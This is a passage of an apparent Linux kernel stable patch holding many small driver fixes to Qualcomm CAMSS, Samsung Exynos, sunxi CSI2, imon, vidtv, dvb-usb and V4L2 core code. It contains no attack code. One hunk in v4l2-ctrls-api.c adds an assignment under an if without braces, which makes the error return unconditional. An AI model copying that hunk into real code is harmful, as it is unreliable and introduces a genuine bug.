+ 	ret = video_check_format(video);
+ 	if (ret < 0)
+@@ -524,6 +524,7 @@ static int video_start_streaming(struct vb2_queue *q, unsigned int count)
+ error:
+ 	video_device_pipeline_stop(vdev);
+ 
++flush_buffers:
+ 	video->ops->flush_buffers(video, VB2_BUF_STATE_QUEUED);
+ 
+ 	return ret;
+diff --git a/drivers/media/platform/qcom/camss/camss.c b/drivers/media/platform/qcom/camss/camss.c
+index 1118c40886d52..a157cac72e0ab 100644
+--- a/drivers/media/platform/qcom/camss/camss.c
++++ b/drivers/media/platform/qcom/camss/camss.c
+@@ -1465,6 +1465,14 @@ static int camss_configure_pd(struct camss *camss)
+ 		return camss->genpd_num;
+ 	}
+ 
++	/*
++	 * If a platform device has just one power domain, then it is attached
++	 * at platform_probe() level, thus there shall be no need and even no
++	 * option to attach it again, this is the case for CAMSS on MSM8916.
++	 */
++	if (camss->genpd_num == 1)
++		return 0;
++
+ 	camss->genpd = devm_kmalloc_array(dev, camss->genpd_num,
+ 					  sizeof(*camss->genpd), GFP_KERNEL);
+ 	if (!camss->genpd)
+@@ -1698,6 +1706,9 @@ void camss_delete(struct camss *camss)
+ 
+ 	pm_runtime_disable(camss->dev);
+ 
++	if (camss->genpd_num == 1)
++		return;
++
+ 	for (i = 0; i < camss->genpd_num; i++) {
+ 		device_link_del(camss->genpd_link[i]);
+ 		dev_pm_domain_detach(camss->genpd[i], true);
+diff --git a/drivers/media/platform/qcom/venus/pm_helpers.c b/drivers/media/platform/qcom/venus/pm_helpers.c
+index c93d2906e4c7d..48c9084bb4dba 100644
+--- a/drivers/media/platform/qcom/venus/pm_helpers.c
++++ b/drivers/media/platform/qcom/venus/pm_helpers.c
+@@ -869,8 +869,8 @@ static int vcodec_domains_get(struct venus_core *core)
+ 	for (i = 0; i < res->vcodec_pmdomains_num; i++) {
+ 		pd = dev_pm_domain_attach_by_name(dev,
+ 						  res->vcodec_pmdomains[i]);
+-		if (IS_ERR(pd))
+-			return PTR_ERR(pd);
++		if (IS_ERR_OR_NULL(pd))
++			return PTR_ERR(pd) ? : -ENODATA;
+ 		core->pmdomains[i] = pd;
+ 	}
+ 
+diff --git a/drivers/media/platform/samsung/exynos4-is/fimc-core.c b/drivers/media/platform/samsung/exynos4-is/fimc-core.c
+index 91cc8d58a663b..1791100b69353 100644
+--- a/drivers/media/platform/samsung/exynos4-is/fimc-core.c
++++ b/drivers/media/platform/samsung/exynos4-is/fimc-core.c
+@@ -1173,7 +1173,7 @@ int __init fimc_register_driver(void)
+ 	return platform_driver_register(&fimc_driver);
+ }
+ 
+-void __exit fimc_unregister_driver(void)
++void fimc_unregister_driver(void)
+ {
+ 	platform_driver_unregister(&fimc_driver);
+ }
+diff --git a/drivers/media/platform/samsung/exynos4-is/media-dev.c b/drivers/media/platform/samsung/exynos4-is/media-dev.c
+index 52b43ea040302..2f3071acb9c97 100644
+--- a/drivers/media/platform/samsung/exynos4-is/media-dev.c
++++ b/drivers/media/platform/samsung/exynos4-is/media-dev.c
+@@ -1380,9 +1380,7 @@ static int subdev_notifier_bound(struct v4l2_async_notifier *notifier,
+ 
+ 	/* Find platform data for this sensor subdev */
+ 	for (i = 0; i < ARRAY_SIZE(fmd->sensor); i++)
+-		if (fmd->sensor[i].asd &&
+-		    fmd->sensor[i].asd->match.fwnode ==
+-		    of_fwnode_handle(subdev->dev->of_node))
++		if (fmd->sensor[i].asd == asd)
+ 			si = &fmd->sensor[i];
+ 
+ 	if (si == NULL)
+@@ -1474,7 +1472,7 @@ static int fimc_md_probe(struct platform_device *pdev)
+ 	pinctrl = devm_pinctrl_get(dev);
+ 	if (IS_ERR(pinctrl)) {
+ 		ret = PTR_ERR(pinctrl);
+-		if (ret != EPROBE_DEFER)
++		if (ret != -EPROBE_DEFER)
+ 			dev_err(dev, "Failed to get pinctrl: %d\n", ret);
+ 		goto err_clk;
+ 	}
+@@ -1586,7 +1584,11 @@ static int __init fimc_md_init(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return platform_driver_register(&fimc_md_driver);
++	ret = platform_driver_register(&fimc_md_driver);
++	if (ret)
++		fimc_unregister_driver();
++
++	return ret;
+ }
+ 
+ static void __exit fimc_md_exit(void)
+diff --git a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc.c b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc.c
+index fca5c6405eec3..007c7dbee0377 100644
+--- a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc.c
++++ b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc.c
+@@ -1576,8 +1576,18 @@ static struct s5p_mfc_variant mfc_drvdata_v7 = {
+ 	.port_num	= MFC_NUM_PORTS_V7,
+ 	.buf_size	= &buf_size_v7,
+ 	.fw_name[0]     = "s5p-mfc-v7.fw",
+-	.clk_names	= {"mfc", "sclk_mfc"},
+-	.num_clocks	= 2,
++	.clk_names	= {"mfc"},
++	.num_clocks	= 1,
++};
++
++static struct s5p_mfc_variant mfc_drvdata_v7_3250 = {
++	.version        = MFC_VERSION_V7,
++	.version_bit    = MFC_V7_BIT,
++	.port_num       = MFC_NUM_PORTS_V7,
++	.buf_size       = &buf_size_v7,
++	.fw_name[0]     = "s5p-mfc-v7.fw",
++	.clk_names      = {"mfc", "sclk_mfc"},
++	.num_clocks     = 2,
+ };
+ 
+ static struct s5p_mfc_buf_size_v6 mfc_buf_size_v8 = {
+@@ -1647,6 +1657,9 @@ static const struct of_device_id exynos_mfc_match[] = {
+ 	}, {
+ 		.compatible = "samsung,mfc-v7",
+ 		.data = &mfc_drvdata_v7,
++	}, {
++		.compatible = "samsung,exynos3250-mfc",
++		.data = &mfc_drvdata_v7_3250,
+ 	}, {
+ 		.compatible = "samsung,mfc-v8",
+ 		.data = &mfc_drvdata_v8,
+diff --git a/drivers/media/platform/st/sti/c8sectpfe/c8sectpfe-core.c b/drivers/media/platform/st/sti/c8sectpfe/c8sectpfe-core.c
+index cefe6b7bfdc4e..1dbb89f0ddb8c 100644
+--- a/drivers/media/platform/st/sti/c8sectpfe/c8sectpfe-core.c
++++ b/drivers/media/platform/st/sti/c8sectpfe/c8sectpfe-core.c
+@@ -925,6 +925,7 @@ static int configure_channels(struct c8sectpfei *fei)
+ 		if (ret) {
+ 			dev_err(fei->dev,
+ 				"configure_memdma_and_inputblock failed\n");
++			of_node_put(child);
+ 			goto err_unmap;
+ 		}
+ 		index++;
+diff --git a/drivers/media/platform/sunxi/sun6i-mipi-csi2/sun6i_mipi_csi2.c b/drivers/media/platform/sunxi/sun6i-mipi-csi2/sun6i_mipi_csi2.c
+index 30d6c0c5161f4..484ac5f054d53 100644
+--- a/drivers/media/platform/sunxi/sun6i-mipi-csi2/sun6i_mipi_csi2.c
++++ b/drivers/media/platform/sunxi/sun6i-mipi-csi2/sun6i_mipi_csi2.c
+@@ -498,6 +498,7 @@ static int sun6i_mipi_csi2_bridge_setup(struct sun6i_mipi_csi2_device *csi2_dev)
+ 	struct v4l2_async_notifier *notifier = &bridge->notifier;
+ 	struct media_pad *pads = bridge->pads;
+ 	struct device *dev = csi2_dev->dev;
++	bool notifier_registered = false;
+ 	int ret;
+ 
+ 	mutex_init(&bridge->lock);
+@@ -519,8 +520,10 @@ static int sun6i_mipi_csi2_bridge_setup(struct sun6i_mipi_csi2_device *csi2_dev)
+ 
+ 	/* Media Pads */
+ 
+-	pads[SUN6I_MIPI_CSI2_PAD_SINK].flags = MEDIA_PAD_FL_SINK;
+-	pads[SUN6I_MIPI_CSI2_PAD_SOURCE].flags = MEDIA_PAD_FL_SOURCE;
++	pads[SUN6I_MIPI_CSI2_PAD_SINK].flags = MEDIA_PAD_FL_SINK |
++					       MEDIA_PAD_FL_MUST_CONNECT;
++	pads[SUN6I_MIPI_CSI2_PAD_SOURCE].flags = MEDIA_PAD_FL_SOURCE |
++						 MEDIA_PAD_FL_MUST_CONNECT;
+ 
+ 	ret = media_entity_pads_init(&subdev->entity, SUN6I_MIPI_CSI2_PAD_COUNT,
+ 				     pads);
+@@ -533,12 +536,17 @@ static int sun6i_mipi_csi2_bridge_setup(struct sun6i_mipi_csi2_device *csi2_dev)
+ 	notifier->ops = &sun6i_mipi_csi2_notifier_ops;
+ 
+ 	ret = sun6i_mipi_csi2_bridge_source_setup(csi2_dev);
+-	if (ret)
++	if (ret && ret != -ENODEV)
+ 		goto error_v4l2_notifier_cleanup;
+ 
+-	ret = v4l2_async_subdev_nf_register(subdev, notifier);
+-	if (ret < 0)
+-		goto error_v4l2_notifier_cleanup;
++	/* Only register the notifier when a sensor is connected. */
++	if (ret != -ENODEV) {
++		ret = v4l2_async_subdev_nf_register(subdev, notifier);
++		if (ret < 0)
++			goto error_v4l2_notifier_cleanup;
++
++		notifier_registered = true;
++	}
+ 
+ 	/* V4L2 Subdev */
+ 
+@@ -549,7 +557,8 @@ static int sun6i_mipi_csi2_bridge_setup(struct sun6i_mipi_csi2_device *csi2_dev)
+ 	return 0;
+ 
+ error_v4l2_notifier_unregister:
+-	v4l2_async_nf_unregister(notifier);
++	if (notifier_registered)
++		v4l2_async_nf_unregister(notifier);
+ 
+ error_v4l2_notifier_cleanup:
+ 	v4l2_async_nf_cleanup(notifier);
+diff --git a/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/sun8i_a83t_mipi_csi2.c b/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/sun8i_a83t_mipi_csi2.c
+index b032ec13a683a..d993c09a48202 100644
+--- a/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/sun8i_a83t_mipi_csi2.c
++++ b/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/sun8i_a83t_mipi_csi2.c
+@@ -536,6 +536,7 @@ sun8i_a83t_mipi_csi2_bridge_setup(struct sun8i_a83t_mipi_csi2_device *csi2_dev)
+ 	struct v4l2_async_notifier *notifier = &bridge->notifier;
+ 	struct media_pad *pads = bridge->pads;
+ 	struct device *dev = csi2_dev->dev;
++	bool notifier_registered = false;
+ 	int ret;
+ 
+ 	mutex_init(&bridge->lock);
+@@ -557,8 +558,10 @@ sun8i_a83t_mipi_csi2_bridge_setup(struct sun8i_a83t_mipi_csi2_device *csi2_dev)
+ 
+ 	/* Media Pads */
+ 
+-	pads[SUN8I_A83T_MIPI_CSI2_PAD_SINK].flags = MEDIA_PAD_FL_SINK;
+-	pads[SUN8I_A83T_MIPI_CSI2_PAD_SOURCE].flags = MEDIA_PAD_FL_SOURCE;
++	pads[SUN8I_A83T_MIPI_CSI2_PAD_SINK].flags = MEDIA_PAD_FL_SINK |
++						    MEDIA_PAD_FL_MUST_CONNECT;
++	pads[SUN8I_A83T_MIPI_CSI2_PAD_SOURCE].flags = MEDIA_PAD_FL_SOURCE |
++						      MEDIA_PAD_FL_MUST_CONNECT;
+ 
+ 	ret = media_entity_pads_init(&subdev->entity,
+ 				     SUN8I_A83T_MIPI_CSI2_PAD_COUNT, pads);
+@@ -571,12 +574,17 @@ sun8i_a83t_mipi_csi2_bridge_setup(struct sun8i_a83t_mipi_csi2_device *csi2_dev)
+ 	notifier->ops = &sun8i_a83t_mipi_csi2_notifier_ops;
+ 
+ 	ret = sun8i_a83t_mipi_csi2_bridge_source_setup(csi2_dev);
+-	if (ret)
++	if (ret && ret != -ENODEV)
+ 		goto error_v4l2_notifier_cleanup;
+ 
+-	ret = v4l2_async_subdev_nf_register(subdev, notifier);
+-	if (ret < 0)
+-		goto error_v4l2_notifier_cleanup;
++	/* Only register the notifier when a sensor is connected. */
++	if (ret != -ENODEV) {
++		ret = v4l2_async_subdev_nf_register(subdev, notifier);
++		if (ret < 0)
++			goto error_v4l2_notifier_cleanup;
++
++		notifier_registered = true;
++	}
+ 
+ 	/* V4L2 Subdev */
+ 
+@@ -587,7 +595,8 @@ sun8i_a83t_mipi_csi2_bridge_setup(struct sun8i_a83t_mipi_csi2_device *csi2_dev)
+ 	return 0;
+ 
+ error_v4l2_notifier_unregister:
+-	v4l2_async_nf_unregister(notifier);
++	if (notifier_registered)
++		v4l2_async_nf_unregister(notifier);
+ 
+ error_v4l2_notifier_cleanup:
+ 	v4l2_async_nf_cleanup(notifier);
+diff --git a/drivers/media/radio/si470x/radio-si470x-usb.c b/drivers/media/radio/si470x/radio-si470x-usb.c
+index 6b2768623c883..aa7a580dbecc0 100644
+--- a/drivers/media/radio/si470x/radio-si470x-usb.c
++++ b/drivers/media/radio/si470x/radio-si470x-usb.c
+@@ -727,8 +727,10 @@ static int si470x_usb_driver_probe(struct usb_interface *intf,
+ 
+ 	/* start radio */
+ 	retval = si470x_start_usb(radio);
+-	if (retval < 0)
++	if (retval < 0 && !radio->int_in_running)
+ 		goto err_buf;
++	else if (retval < 0)	/* in case of radio->int_in_running == 1 */
++		goto err_all;
+ 
+ 	/* set initial frequency */
+ 	si470x_set_freq(radio, 87.5 * FREQ_MUL); /* available in all regions */
+diff --git a/drivers/media/rc/imon.c b/drivers/media/rc/imon.c
+index 5edfd8a9e8494..74546f7e34691 100644
+--- a/drivers/media/rc/imon.c
++++ b/drivers/media/rc/imon.c
+@@ -646,15 +646,14 @@ static int send_packet(struct imon_context *ictx)
+ 		pr_err_ratelimited("error submitting urb(%d)\n", retval);
+ 	} else {
+ 		/* Wait for transmission to complete (or abort) */
+-		mutex_unlock(&ictx->lock);
+ 		retval = wait_for_completion_interruptible(
+ 				&ictx->tx.finished);
+ 		if (retval) {
+ 			usb_kill_urb(ictx->tx_urb);
+ 			pr_err_ratelimited("task interrupted\n");
+ 		}
+-		mutex_lock(&ictx->lock);
+ 
++		ictx->tx.busy = false;
+ 		retval = ictx->tx.status;
+ 		if (retval)
+ 			pr_err_ratelimited("packet tx failed (%d)\n", retval);
+@@ -953,7 +952,8 @@ static ssize_t vfd_write(struct file *file, const char __user *buf,
+ 	if (ictx->disconnected)
+ 		return -ENODEV;
+ 
+-	mutex_lock(&ictx->lock);
++	if (mutex_lock_interruptible(&ictx->lock))
++		return -ERESTARTSYS;
+ 
+ 	if (!ictx->dev_present_intf0) {
+ 		pr_err_ratelimited("no iMON device present\n");
+diff --git a/drivers/media/test-drivers/vidtv/vidtv_bridge.c b/drivers/media/test-drivers/vidtv/vidtv_bridge.c
+index 82620613d56b8..dff7265a42ca2 100644
+--- a/drivers/media/test-drivers/vidtv/vidtv_bridge.c
++++ b/drivers/media/test-drivers/vidtv/vidtv_bridge.c
+@@ -459,26 +459,20 @@ fail_dmx_conn:
+ 	for (j = j - 1; j >= 0; --j)
+ 		dvb->demux.dmx.remove_frontend(&dvb->demux.dmx,
+ 					       &dvb->dmx_fe[j]);
+-fail_dmx_dev:
+ 	dvb_dmxdev_release(&dvb->dmx_dev);
+-fail_dmx:
++fail_dmx_dev:
+ 	dvb_dmx_release(&dvb->demux);
++fail_dmx:
++fail_demod_probe:
++	for (i = i - 1; i >= 0; --i) {
++		dvb_unregister_frontend(dvb->fe[i]);
+ fail_fe:
+-	for (j = i; j >= 0; --j)
+-		dvb_unregister_frontend(dvb->fe[j]);
++		dvb_module_release(dvb->i2c_client_tuner[i]);
+ fail_tuner_probe:
+-	for (j = i; j >= 0; --j)
+-		if (dvb->i2c_client_tuner[j])
+-			dvb_module_release(dvb->i2c_client_tuner[j]);
+-
+-fail_demod_probe:
+-	for (j = i; j >= 0; --j)
+-		if (dvb->i2c_client_demod[j])
+-			dvb_module_release(dvb->i2c_client_demod[j]);
+-
++		dvb_module_release(dvb->i2c_client_demod[i]);
++	}
+ fail_adapter:
+ 	dvb_unregister_adapter(&dvb->adapter);
+-
+ fail_i2c:
+ 	i2c_del_adapter(&dvb->i2c_adapter);
+ 
+diff --git a/drivers/media/test-drivers/vimc/vimc-core.c b/drivers/media/test-drivers/vimc/vimc-core.c
+index 2ae7a0f11ebfc..e82cfa5ffbf47 100644
+--- a/drivers/media/test-drivers/vimc/vimc-core.c
++++ b/drivers/media/test-drivers/vimc/vimc-core.c
+@@ -433,7 +433,7 @@ static int __init vimc_init(void)
+ 	if (ret) {
+ 		dev_err(&vimc_pdev.dev,
+ 			"platform driver registration failed (err=%d)\n", ret);
+-		platform_driver_unregister(&vimc_pdrv);
++		platform_device_unregister(&vimc_pdev);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/media/test-drivers/vivid/vivid-vid-cap.c b/drivers/media/test-drivers/vivid/vivid-vid-cap.c
+index 11620eaf941e3..c0999581c599b 100644
+--- a/drivers/media/test-drivers/vivid/vivid-vid-cap.c
++++ b/drivers/media/test-drivers/vivid/vivid-vid-cap.c
+@@ -973,6 +973,7 @@ int vivid_vid_cap_s_selection(struct file *file, void *fh, struct v4l2_selection
+ 			if (dev->has_compose_cap) {
+ 				v4l2_rect_set_min_size(compose, &min_rect);
+ 				v4l2_rect_set_max_size(compose, &max_rect);
++				v4l2_rect_map_inside(compose, &fmt);
+ 			}
+ 			dev->fmt_cap_rect = fmt;
+ 			tpg_s_buf_height(&dev->tpg, fmt.height);
+diff --git a/drivers/media/usb/dvb-usb/az6027.c b/drivers/media/usb/dvb-usb/az6027.c
+index cf15988dfb510..7d78ee09be5e1 100644
+--- a/drivers/media/usb/dvb-usb/az6027.c
++++ b/drivers/media/usb/dvb-usb/az6027.c
+@@ -975,6 +975,10 @@ static int az6027_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int n
+ 		if (msg[i].addr == 0x99) {
+ 			req = 0xBE;
+ 			index = 0;
++			if (msg[i].len < 1) {
++				i = -EOPNOTSUPP;
++				break;
++			}
+ 			value = msg[i].buf[0] & 0x00ff;
+ 			length = 1;
+ 			az6027_usb_out_op(d, req, value, index, data, length);
+diff --git a/drivers/media/usb/dvb-usb/dvb-usb-init.c b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+index 61439c8f33cab..58eea8ab54779 100644
+--- a/drivers/media/usb/dvb-usb/dvb-usb-init.c
++++ b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+@@ -81,7 +81,7 @@ static int dvb_usb_adapter_init(struct dvb_usb_device *d, short *adapter_nrs)
+ 
+ 		ret = dvb_usb_adapter_stream_init(adap);
+ 		if (ret)
+-			return ret;
++			goto stream_init_err;
+ 
+ 		ret = dvb_usb_adapter_dvb_init(adap, adapter_nrs);
+ 		if (ret)
+@@ -114,6 +114,8 @@ frontend_init_err:
+ 	dvb_usb_adapter_dvb_exit(adap);
+ dvb_init_err:
+ 	dvb_usb_adapter_stream_exit(adap);
++stream_init_err:
++	kfree(adap->priv);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/media/v4l2-core/v4l2-ctrls-api.c b/drivers/media/v4l2-core/v4l2-ctrls-api.c
+index d0a3aa3806fbd..3d3b6dc24ca63 100644
+--- a/drivers/media/v4l2-core/v4l2-ctrls-api.c
++++ b/drivers/media/v4l2-core/v4l2-ctrls-api.c
+@@ -150,6 +150,7 @@ static int user_to_new(struct v4l2_ext_control *c, struct v4l2_ctrl *ctrl)
+ 			 * then return an error.
+ 			 */
+ 			if (strlen(ctrl->p_new.p_char) == ctrl->maximum && last)
++			ctrl->is_new = 1;
+ 				return -ERANGE;
+ 		}
+ 		return ret;
+diff --git a/drivers/media/v4l2-core/v4l2-ctrls-core.c b/drivers/media/v4l2-core/v4l2-ctrls-core.c
+index 0dab1d7b90f0e..29169170880a6 100644
+--- a/drivers/media/v4l2-core/v4l2-ctrls-core.c
++++ b/drivers/media/v4l2-core/v4l2-ctrls-core.c
+@@ -1827,7 +1827,7 @@ struct v4l2_ctrl *v4l2_ctrl_new_std_menu(struct v4l2_ctrl_handler *hdl,
+ 	else if (type == V4L2_CTRL_TYPE_INTEGER_MENU)
+ 		qmenu_int = v4l2_ctrl_get_int_menu(id, &qmenu_int_len);
+ 
+-	if ((!qmenu && !qmenu_int) || (qmenu_int && max > qmenu_int_len)) {
++	if ((!qmenu && !qmenu_int) || (qmenu_int && max >= qmenu_int_len)) {
+ 		handler_set_err(hdl, -EINVAL);
+ 		return NULL;
+ 	}
+diff --git a/drivers/media/v4l2-core/v4l2-ioctl.c b/drivers/media/v4l2-core/v4l2-ioctl.c
+index fddba75d90745..6876ec25bc512 100644
+--- a/drivers/media/v4l2-core/v4l2-ioctl.c
++++ b/drivers/media/v4l2-core/v4l2-ioctl.c
+@@ -1347,23 +1347,23 @@ static void v4l_fill_fmtdesc(struct v4l2_fmtdesc *fmt)
+ 	case V4L2_PIX_FMT_YUV420:	descr = "Planar YUV 4:2:0"; break;
+ 	case V4L2_PIX_FMT_HI240:	descr = "8-bit Dithered RGB (BTTV)"; break;
+ 	case V4L2_PIX_FMT_M420:		descr = "YUV 4:2:0 (M420)"; break;
+-	case V4L2_PIX_FMT_NV12:		descr = "Y/CbCr 4:2:0"; break;
+-	case V4L2_PIX_FMT_NV21:		descr = "Y/CrCb 4:2:0"; break;
+-	case V4L2_PIX_FMT_NV16:		descr = "Y/CbCr 4:2:2"; break;
+-	case V4L2_PIX_FMT_NV61:		descr = "Y/CrCb 4:2:2"; break;
+-	case V4L2_PIX_FMT_NV24:		descr = "Y/CbCr 4:4:4"; break;
+-	case V4L2_PIX_FMT_NV42:		descr = "Y/CrCb 4:4:4"; break;
+-	case V4L2_PIX_FMT_P010:		descr = "10-bit Y/CbCr 4:2:0"; break;
+-	case V4L2_PIX_FMT_NV12_4L4:	descr = "Y/CbCr 4:2:0 (4x4 Linear)"; break;
+-	case V4L2_PIX_FMT_NV12_16L16:	descr = "Y/CbCr 4:2:0 (16x16 Linear)"; break;
+-	case V4L2_PIX_FMT_NV12_32L32:   descr = "Y/CbCr 4:2:0 (32x32 Linear)"; break;
+-	case V4L2_PIX_FMT_P010_4L4:	descr = "10-bit Y/CbCr 4:2:0 (4x4 Linear)"; break;
+-	case V4L2_PIX_FMT_NV12M:	descr = "Y/CbCr 4:2:0 (N-C)"; break;
+-	case V4L2_PIX_FMT_NV21M:	descr = "Y/CrCb 4:2:0 (N-C)"; break;
+-	case V4L2_PIX_FMT_NV16M:	descr = "Y/CbCr 4:2:2 (N-C)"; break;
+-	case V4L2_PIX_FMT_NV61M:	descr = "Y/CrCb 4:2:2 (N-C)"; break;
+-	case V4L2_PIX_FMT_NV12MT:	descr = "Y/CbCr 4:2:0 (64x32 MB, N-C)"; break;
+-	case V4L2_PIX_FMT_NV12MT_16X16:	descr = "Y/CbCr 4:2:0 (16x16 MB, N-C)"; break;
++	case V4L2_PIX_FMT_NV12:		descr = "Y/UV 4:2:0"; break;
++	case V4L2_PIX_FMT_NV21:		descr = "Y/VU 4:2:0"; break;
++	case V4L2_PIX_FMT_NV16:		descr = "Y/UV 4:2:2"; break;
++	case V4L2_PIX_FMT_NV61:		descr = "Y/VU 4:2:2"; break;
++	case V4L2_PIX_FMT_NV24:		descr = "Y/UV 4:4:4"; break;
++	case V4L2_PIX_FMT_NV42:		descr = "Y/VU 4:4:4"; break;
++	case V4L2_PIX_FMT_P010:		descr = "10-bit Y/UV 4:2:0"; break;
++	case V4L2_PIX_FMT_NV12_4L4:	descr = "Y/UV 4:2:0 (4x4 Linear)"; break;
++	case V4L2_PIX_FMT_NV12_16L16:	descr = "Y/UV 4:2:0 (16x16 Linear)"; break;
++	case V4L2_PIX_FMT_NV12_32L32:   descr = "Y/UV 4:2:0 (32x32 Linear)"; break;
++	case V4L2_PIX_FMT_P010_4L4:	descr = "10-bit Y/UV 4:2:0 (4x4 Linear)"; break;
++	case V4L2_PIX_FMT_NV12M:	descr = "Y/UV 4:2:0 (N-C)"; break;
++	case V4L2_PIX_FMT_NV21M:	descr = "Y/VU 4:2:0 (N-C)"; break;
++	case V4L2_PIX_FMT_NV16M:	descr = "Y/UV 4:2:2 (N-C)"; break;
++	case V4L2_PIX_FMT_NV61M:	descr = "Y/VU 4:2:2 (N-C)"; break;
++	case V4L2_PIX_FMT_NV12MT:	descr = "Y/UV 4:2:0 (64x32 MB, N-C)"; break;
++	case V4L2_PIX_FMT_NV12MT_16X16:	descr = "Y/UV 4:2:0 (16x16 MB, N-C)"; break;
+ 	case V4L2_PIX_FMT_YUV420M:	descr = "Planar YUV 4:2:0 (N-C)"; break;
+ 	case V4L2_PIX_FMT_YVU420M:	descr = "Planar YVU 4:2:0 (N-C)"; break;
+ 	case V4L2_PIX_FMT_YUV422M:	descr = "Planar YUV 4:2:2 (N-C)"; break;
+diff --git a/drivers/media/v4l2-core/videobuf-dma-contig.c b/drivers/media/v4l2-core/videobuf-dma-contig.c
+index 52312ce2ba056..f2c4393595574 100644
+--- a/drivers/media/v4l2-core/videobuf-dma-contig.c
++++ b/drivers/media/v4l2-core/videobuf-dma-contig.c
+@@ -36,12 +36,11 @@ struct videobuf_dma_contig_memory {
+ 
+ static int __videobuf_dc_alloc(struct device *dev,
+ 			       struct videobuf_dma_contig_memory *mem,
+-			       unsigned long size, gfp_t flags)
++			       unsigned long size)
+ {
+ 	mem->size = size;
+-	mem->vaddr = dma_alloc_coherent(dev, mem->size,
+-					&mem->dma_handle, flags);
+-
++	mem->vaddr = dma_alloc_coherent(dev, mem->size, &mem->dma_handle,
++					GFP_KERNEL);
+ 	if (!mem->vaddr) {
+ 		dev_err(dev, "memory alloc size %ld failed\n", mem->size);
+ 		return -ENOMEM;
+@@ -258,8 +257,7 @@ static int __videobuf_iolock(struct videobuf_queue *q,
+ 			return videobuf_dma_contig_user_get(mem, vb);
+ 
+ 		/* allocate memory for the read() method */
+-		if (__videobuf_dc_alloc(q->dev, mem, PAGE_ALIGN(vb->size),
+-					GFP_KERNEL))
++		if (__videobuf_dc_alloc(q->dev, mem, PAGE_ALIGN(vb->size)))
+ 			return -ENOMEM;
+ 		break;
+ 	case V4L2_MEMORY_OVERLAY:
+@@ -295,22 +293,18 @@ static int __videobuf_mmap_mapper(struct videobuf_queue *q,
+ 	BUG_ON(!mem);
+ 	MAGIC_CHECK(mem->magic, MAGIC_DC_MEM);
+ 
+-	if (__videobuf_dc_alloc(q->dev, mem, PAGE_ALIGN(buf->bsize),
+-				GFP_KERNEL | __GFP_COMP))
++	if (__videobuf_dc_alloc(q->dev, mem, PAGE_ALIGN(buf->bsize)))
+ 		goto error;
+ 
+-	/* Try to remap memory */
+-	vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
+-
+ 	/* the "vm_pgoff" is just used in v4l2 to find the
+ 	 * corresponding buffer data structure which is allocated
+ 	 * earlier and it does not mean the offset from the physical
+ 	 * buffer start address as usual. So set it to 0 to pass
+-	 * the sanity check in vm_iomap_memory().
++	 * the sanity check in dma_mmap_coherent().
+ 	 */
+ 	vma->vm_pgoff = 0;
+-
+-	retval = vm_iomap_memory(vma, mem->dma_handle, mem->size);
++	retval = dma_mmap_coherent(q->dev, vma, mem->vaddr, mem->dma_handle,
++				   mem->size);
+ 	if (retval) {
+ 		dev_err(q->dev, "mmap: remap failed with error %d. ",
+ 			retval);
+diff --git a/drivers/memory/renesas-rpc-if.c b/drivers/memory/renesas-rpc-if.c
+index 4316988d791a5..61c288d403750 100644
+--- a/drivers/memory/renesas-rpc-if.c
++++ b/drivers/memory/renesas-rpc-if.c
+@@ -317,6 +317,9 @@ int rpcif_hw_init(struct rpcif *rpc, bool hyperflash)
+ 	regmap_update_bits(rpc->regmap, RPCIF_PHYCNT, RPCIF_PHYCNT_PHYMEM_MASK,
+ 			   RPCIF_PHYCNT_PHYMEM(hyperflash ? 3 : 0));
+ 
++	/* DMA Transfer is not supported */
++	regmap_update_bits(rpc->regmap, RPCIF_PHYCNT, RPCIF_PHYCNT_HS, 0);
++
+ 	if (rpc->type == RPCIF_RCAR_GEN3)
+ 		regmap_update_bits(rpc->regmap, RPCIF_PHYCNT,
+ 				   RPCIF_PHYCNT_STRTIM(7), RPCIF_PHYCNT_STRTIM(7));
+diff --git a/drivers/memstick/core/ms_block.c b/drivers/memstick/core/ms_block.c
+index ba84145195158..04115cd92433b 100644
+--- a/drivers/memstick/core/ms_block.c
++++ b/drivers/memstick/core/ms_block.c
+@@ -2116,6 +2116,11 @@ static int msb_init_disk(struct memstick_dev *card)
+ 	dbg("Set total disk size to %lu sectors", capacity);
+ 
+ 	msb->io_queue = alloc_ordered_workqueue("ms_block", WQ_MEM_RECLAIM);
++	if (!msb->io_queue) {
++		rc = -ENOMEM;
++		goto out_cleanup_disk;
++	}
++
+ 	INIT_WORK(&msb->io_work, msb_io_work);
+ 	sg_init_table(msb->prealloc_sg, MS_BLOCK_MAX_SEGS+1);
+ 
+@@ -2125,10 +2130,12 @@ static int msb_init_disk(struct memstick_dev *card)
+ 	msb_start(card);
+ 	rc = device_add_disk(&card->dev, msb->disk, NULL);
+ 	if (rc)
+-		goto out_cleanup_disk;
++		goto out_destroy_workqueue;
+ 	dbg("Disk added");
+ 	return 0;
+ 
++out_destroy_workqueue:
++	destroy_workqueue(msb->io_queue);
+ out_cleanup_disk:
+ 	put_disk(msb->disk);
+ out_free_tag_set:
+diff --git a/drivers/mfd/Kconfig b/drivers/mfd/Kconfig
+index 8b93856de432a..9940e2724c05d 100644
+--- a/drivers/mfd/Kconfig
++++ b/drivers/mfd/Kconfig
+@@ -2027,6 +2027,7 @@ config MFD_ROHM_BD957XMUF
+ 	depends on I2C=y
+ 	depends on OF
+ 	select REGMAP_I2C
++	select REGMAP_IRQ
+ 	select MFD_CORE
+ 	help
+ 	  Select this option to get support for the ROHM BD9576MUF and
+diff --git a/drivers/mfd/axp20x.c b/drivers/mfd/axp20x.c
+index 88a212a8168cf..880c41fa7021b 100644
+--- a/drivers/mfd/axp20x.c
++++ b/drivers/mfd/axp20x.c
+@@ -842,7 +842,7 @@ static void axp20x_power_off(void)
+ 		     AXP20X_OFF);
+ 
+ 	/* Give capacitors etc. time to drain to avoid kernel panic msg. */
+-	msleep(500);
++	mdelay(500);
+ }
+ 
+ int axp20x_match_device(struct axp20x_dev *axp20x)
